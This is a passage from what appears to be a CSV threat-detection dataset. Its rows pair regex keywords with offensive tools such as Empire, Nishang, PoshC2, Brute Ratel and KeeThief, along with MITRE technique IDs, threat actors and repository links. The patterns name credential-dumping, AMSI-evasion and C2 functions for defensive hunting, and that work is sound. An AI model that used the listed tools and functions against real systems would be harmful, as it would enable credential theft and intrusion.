Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46172" "*Get-PacketSMB*",".{0,1000}Get\-PacketSMB.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46173" "*Get-PassHashes*",".{0,1000}Get\-PassHashes.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46174" "*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46175" "*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46176" "*Get-PassHints*",".{0,1000}Get\-PassHints.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46177" "*get-passnotexp*",".{0,1000}get\-passnotexp.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46178" "*get-password-policy.py*",".{0,1000}get\-password\-policy\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","46179" "*Get-PEBasicInfo*",".{0,1000}Get\-PEBasicInfo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46180" "*Get-PEHeader.ps1*",".{0,1000}Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46181" "*getPositionImplant*",".{0,1000}getPositionImplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","46182" "*Get-PotentialDLLHijack*",".{0,1000}Get\-PotentialDLLHijack.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","46183" "*Get-PrivilegedGroupAccounts*",".{0,1000}Get\-PrivilegedGroupAccounts.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46184" "*Get-PrivilegedGroupMembership*",".{0,1000}Get\-PrivilegedGroupMembership.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46185" "*getprivs.bin*",".{0,1000}getprivs\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - 
T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46186" "*getprivs.exe*",".{0,1000}getprivs\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46187" "*get-process *amsi.dll*",".{0,1000}get\-process\s.{0,1000}amsi\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46188" "*GetProcHandleClient.exe *",".{0,1000}GetProcHandleClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode 
rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46189" "*getProcUAC1password.h*",".{0,1000}getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","46190" "*Get-PSADForestInfo *",".{0,1000}Get\-PSADForestInfo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46191" "*Get-PSADForestKRBTGTInfo *",".{0,1000}Get\-PSADForestKRBTGTInfo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46192" "*Get-PSAmsiScanResult *",".{0,1000}Get\-PSAmsiScanResult\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","46193" "*Get-RBCD-Threaded*",".{0,1000}Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory 
Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","N/A","2","121","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z","46194" "*Get-RegAlwaysInstallElevated*",".{0,1000}Get\-RegAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46195" "*Get-RegAutoLogon*",".{0,1000}Get\-RegAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46196" 
"*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46197" 
"*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46198" "*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46199" "*GetRegistryValue*SOFTWARE\Veeam\Veeam Backup Catalog*",".{0,1000}GetRegistryValue.{0,1000}SOFTWARE\\Veeam\\Veeam\sBackup\sCatalog.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#registry","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","46201" "*Get-RegLoggedOn 
*",".{0,1000}Get\-RegLoggedOn\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46202" "*Get-RegLoggedOn*",".{0,1000}Get\-RegLoggedOn.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46203" "*GetRektBoy724/SharpUnhooker*",".{0,1000}GetRektBoy724\/SharpUnhooker.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","46204" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials 